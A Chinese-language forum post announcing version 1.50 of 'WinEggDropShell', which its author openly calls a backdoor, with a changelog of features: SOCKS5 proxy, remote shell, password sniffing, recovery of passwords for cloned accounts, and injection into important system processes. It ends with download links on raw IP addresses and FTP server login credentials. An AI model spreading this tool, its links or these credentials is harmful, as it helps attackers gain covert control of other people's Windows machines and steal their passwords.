|
 | 作者: wineggdrop [wineggdrop]
 论坛用户 |
登录 |
| V1.50(终极版本) 1.增加了Sock5代理功能,支持无密码和有密码验证两种方式。 2.增加了一个ExitShell的功能,在得到shell后,如果想回到[Melody]那里的 话,就使用这个命令.(详细信息请查看特别功能说明)。 3.增加了一个Cmd Redirector的功能,此功能主要是在[Melody]下输入系统 命令或外部命令时,将返回信息直接输回给用户看.(详细信息请查看特别 功能说明)。 4.修改了杀进程的代码(修改以前版本的一点小问题)。 5.修改了查看系统用户的功能(双字节的系统帐户都可以显示了)。 6.修改了恢复关联的一些代码(对于一些恶意代码乱改的关联强行改回来)。 7.修改了注册表操作的一些代码(主要是对于在是读出一些有问题的注册表 的数据时做了严格的处理,以免因为数组过界问题导致后门死掉)。 8.对于大部份字符串的操作,如复制字符串,追加字符串等的操作中进行 了严格的数组的边界检测(不检测字符串操作时产生的副作用,是溢出等 问题的根源)。 9.重写了加载程序,使程序由32k缩小到只是6k大小。 10.修改了一些代码,对于得到shell后用CTRL+C关闭shell或将cmd窗口关闭 后后门自动关闭的问题,在最终版本前,对于这类异常操作都是交给系 统处理的,重写代码后自己处理这部分的异常操作,这是由于如果后门 插入到重要进程后,如果被关闭的话,系统会死掉或重启,所以对于异 常事件的处理最终还是写代码由程序本身去检测并作出相应处理。需要 注意的是,如果使用Ctrl+C或直接将cmd窗口关闭的话,等几秒后再连接 上去,因为后门需要些时间处理这个异常的情况。 11.对于注册表操作功能也提供了完好的在线帮助。 12.修复了嗅探密码时输入一个不存在的NIC号的错误(大bug,后门会死掉) 13.修改了findpassword的部分代码,使这功能可以得到克隆帐户的密码。 14.修改了部分代码使有些功能可以兼容于最新的Windows .NET 2003统。 15.优化了很多功能的代码。 压缩版本: 216.232.201.115/WinEggDropShellFinal.zip 无压缩版本: 216.232.201.115/UnPack.RAR 动画教程: http://www.wangyi.cn/wolf/Jc.ALL.WinEggDropShell.rar 我建的ftp服务器 209.155.169.163 端口:21211 用户名:WinEggDrop 密码:wineggdropshell 顺道测试和朋友写的FTP服务程序 [此贴被 wineggdrop(wineggdrop) 在 05月03日16时40分 编辑过] |
| 地主 发表时间: 05/03 11:37 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 原创软件
标题: WinEggDropShellUltimateVersion